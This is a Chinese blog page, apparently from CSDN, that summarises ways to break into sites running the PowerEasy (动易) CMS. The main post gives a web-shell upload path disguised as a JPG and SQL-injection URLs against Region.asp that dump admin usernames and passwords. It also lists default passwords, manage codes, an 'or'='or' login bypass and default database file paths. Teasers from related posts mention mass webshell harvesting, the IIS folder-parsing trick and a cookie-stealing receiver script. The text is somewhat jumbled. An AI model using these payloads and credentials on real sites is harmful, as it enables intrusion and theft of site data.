动易html在线编辑器 漏洞,动易网站漏洞总结

最新推荐文章于 2021-06-27 08:33:16 发布
最新推荐文章于 2021-06-27 08:33:16 发布
阅读量557 收藏
点赞数
文章标签: 动易html在线编辑器 漏洞

ddde55ec7d5408427157626c7e48c6f8.png

动易漏洞总结

方法1:

注册用户 keio.asAhttp://xtfhzx.com/reg/user_reg.asp

上传jpg马http://www.URL.com/user/Upload.asp?dialogtype=UserBlogPic&size=5

方法2:

先暴所有管理员帐号。/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1<>

暴管理员密码http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+username="admin"+and+'1'='1

用记事本打开网站这个目录下的文件:\config\SiteOption.config ,找到下面的代码处,修改红色标识的代码即可:

8888

2、对于SiteWeaver 版本,请用记事本打开网站根目录下的文件:config.asp,找到下面的代码处,修改红色标识的代码即可:

Const SiteManageCode = "PowerEasy2008"

常用账号和密码:

admin

admin888

'or'='or'

8888

2007

2008

2006

SiteManageCode8888/SiteManageCode

PowerEasy2006

PowerEasy2007

PowerEasy2008

数据库目录路径:

database/PowerEasy2006.mdb

database/PowerEasy2007.mdb

database/PowerEasy2008.mdb

database/SiteWeaver6.5.mdb

database/SiteWeaver.mdb

滕誊縢
关注
网页编辑漏洞大全
07-13
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWebEditorNET、所谓的 southidceditor、所谓的bigcneditor
动易html在线编辑器 漏洞,动易上传漏洞1小时狂拿50个WEBSHELL
weixin_31264565的博客
05-30 420
动易上传漏洞1小时狂拿50个WEBSHELL风云QQ:325013287++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++大家好,我是风云,今天给咱们群做个教程。希望大家把这动易漏洞保密。这些是我整理出来的,工具:网站猎手,旁注搜索这个:powered by mypo...
动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
weixin_39553904的博客
05-30 1032
动易网站管理系统vote.asp页面存在SQL注入漏洞测试系统:动易(PowerEasy CMS SP6 071030以下版本)安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。漏洞描述:vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入但是其语句里面过滤...
IIS解析缺陷,动易动网的又一新漏洞
her0z的专栏
03-27 1542
IIS解析缺陷,动易动网的又一新漏洞在服务器上新建一个文件夹,命名为: Vo.asp (注意是文件夹的名字)然后将你的ASP文件(假设:name.asp)改成 Name.jpg( 或其他后缀名)放到Vo.asp文件夹下访问:http://地址/Vo.asp/Name.jpg发现了什么? JPG文件被当成ASP执行了吧!针对动易的攻击方法:前提要求:该网站使用 动易系统,并且
HTML5特性与漏洞
zuoyidaren的博客
12-02 406
1.什么是 HTML5HTML5 将成为 HTML、XHTML 以及 HTML DOM 的新标准。 HTML 的上一个版本诞生于 1999 年。自从那以后,Web 世界已经经历了巨变。 HTML5 仍处于完善之中。然而,大部分现代浏览器已经具备了某些 HTML5 支持。 为 HTML5 建立的一些规则: 新特性应该基于 HTML、CSS、DOM 以及 JavaScr...
常见的WEB漏洞——HTML5安全与防御
weixin_43815032的博客
04-25 243
HTML5安全与防御 一、HTML5概述 HTML5 是定义 HTML 标准的最新的版本,5的原因是它是HTML的第五次重大修改,标准于14年10月29日完成。作为HTML的升级版,它有更大的技术集,引入了新的标签、属性、方法和功能等,允许更多样化和强大的网站和应用程序。 比如说新增了<section>, <article>, &lt...
动易html编辑漏洞,动易网站管理系统删除任意文件漏洞
weixin_42522626的博客
06-25 731
这个漏洞对于动易网站管理系统来说,就是致命的了。此漏洞存在于User目录下的User_saveflash.asp文件中,其第6~22行代码如下所示。Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonthobjName_FSO = Application("objName_FSO")ObjInst...
动易CMS 6.8 编辑器替换为百度Ueditor 1.4 3.3 前台部分
11-08
动易CMS 6.8 编辑器替换为百度Ueditor 1.4 3.3 前台部分,用户登录发文章的编辑器,补充下。昨天忘记了。 —————————————————————————— 日期显示118 兼容修改 = (nowDate.getYear() )?...
动易SiteWeaver 6.8替换为百度编辑器UEditor
11-08
动易SiteWeaver 6.8 CMS使用众多,但是使用的编辑器老旧,不兼容主流浏览器,替换为兼容更好百度编辑器UEditor [1.4.3.3 Asp 版本],覆盖就行。 好几次叫我弄,一直没帮他们完善。百度了大大们的教程,现测试好用。有...
动易系统解决IE8网站后台编辑器无效问题
09-28
标题中的“动易系统解决IE8网站后台编辑器无效问题”指的是动易系统(PowerEasy)在用户升级到Internet Explorer 8(简称IE8)浏览器后,其后台编辑器出现故障,无法正常工作。描述中提到的具体症状是,当用户尝试...
动易漏洞
asp经验积累
02-16 9857
动易漏洞动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。总是用工具注入,水平也不会提高
html5表单提交json数据库,CSRF漏洞中以form形式用POST方法提交json数据的POC
weixin_42522626的博客
06-04 676
目录0x01 写在前面今天遇到的,查了很多资料,发现这种形式的基本上没看到,圈子里某个师傅发了一个国外的链接,参考了一下,最后成功构造poc。0x02 POCform提交post数据很简单,如下:This i a CSRF test!但是这种方式存在缺陷,如下图:始终有个“=”摆脱不了,但是用下面这种方式成功摆脱:This i a CSRF test!这里的技巧主要在于name和value的值共同...
html5安全,HTML5对安全的改进 HTML5安全攻防详析终结篇
weixin_29301059的博客
06-27 213
HTML5对旧有的安全策略进行了非常多的补充。一、iframe沙箱HTML5为iframe元素增加了sandbox属性防止不信任的Web页面执行某些操作,例如访问父页面的DOM、执行脚本、访问本地存储或者本地数据库等等。但是这个安全策略又会带来另外的风险,这很有趣,例如ClickJacking攻击里阻止JavaScript脚本的运行来绕过JavaScript的防御方式。二、CSP内容安全策略XSS...
为什么把代码和数据分离可以预防sql注入攻击_从三类常见高危漏洞 洞见那些“风平浪静”的代码...
weixin_39671374的博客
12-03 307
在研发人员眼中,编码开发的目的是实现相关功能逻辑可用,无明显功能 bug。而实际上,在安全人员眼中,很多这样看似没有功能问题的代码,却可以利用来进行安全漏洞攻击。虽然这在很多研发人员眼中是看似天方夜谭,但很不幸,通过以往的无数重大安全事件的验证,这个事实客观存在。本文主要针对三类最有代表性、安全威胁等级最高的安全漏洞进行着重分析,从安全角度介绍看似合理的功能实现代码是如何被 “攻破” 的。所谓 S...
HTML5再曝漏洞 安全性遭质疑
weixin_34235457的博客
03-14 78
2013年03月14日 10:51:01来源:人民邮电报   作为新一代Web语言,HTML5凭借丰富应用、跨平台等特点被公认为未来网页技术的发展方向,并且被全球多家主流厂商寄予厚望。然而,在已经过去的一周, 风头正盛的HTML5却遭受了不小的打击。国外媒体爆料,HTML5在Cookie上的巨大漏洞,将可能短时间内挤爆用户的硬盘。这无疑是给支持HTML5的浏览器厂商泼了一盆冷水,也让用户对于...
HTML5中容易被攻击的5个“漏洞
fstudio
12-06 2613
HTML5迅速崛起的同时,我们也不得不认识到HTML5给我们带来的安全问题,而且是不容小觑的安全问题。本文主要从劫持、跨域请求、桌面通知、地理定位、表单篡改这几个方面来分析了HTML5中不容忽视的几个安全“漏洞”,开发者要时刻警惕。 “虽然,HTML5对加强网站互动性的新功能有着一定的作用和贡献,但是对于不怀好意者,HTML5的“漏洞”更容易成为他们的攻击目标。” 因此,本文会从五个
动易html编辑漏洞,动易2006_SP6最新漏洞得到管理员密码
weixin_39622150的博客
06-25 371
鬼仔注:从7j那里看到的,并且有7j写的接收页面。7j:没有找到他说的接收页面,只有自已用PHP写个了$filename = date("Ymd").".txt";$time = @date("Y年m月d号H点i分s秒",time());$cookie = $_POST['cookie'];$url = $_POST['url'];$hostname = $_POST['hostname'];if...
动易cms net版本拿shell
shaolj666的博客
10-11 1437
大家都知道动易的.net版本基本网上没什么漏洞,基本我遇到动易.net版本的时候也是基本放弃(试完弱口令和旁站之后)这次遇到了个动易aspx的,人品爆发弱口令进去了然后开始拿shell一脸懵b啊,没遇到过啊,百度搜索也都是asp版本的拿shell, aspx无效啊,只能自己慢慢摸索了,在系统设置中看到了这个,, 可以自定义路径,我擦,这样的话我给他定义到一个存放着aspx文件的目录不就可以修改aspx了吗 也可以试试iis6.0解析漏洞 前提web服务器是iis6.0 设置到api这个目录。。 然后复
动易网站管理系统删除任意文件漏洞
jahn的专栏
09-23 2321
这个漏洞对于动易网站管理系统来说,就是致命的了。此漏洞存在于User目录下的User_saveflash.asp文件中,其第6~22行代码如下所示。Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonthobjName_FSO = Application("objName_FSO")ObjInst
动易网站管理系统入门指南
总结来说,动易网站管理系统以其强大的内容管理、安全稳定的运行环境、丰富的功能模块以及易于操作的特性,成为众多企业和个人建立网站的首选工具。无论是初次接触网站管理的新手,还是有经验的开发者,都能从中受益...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值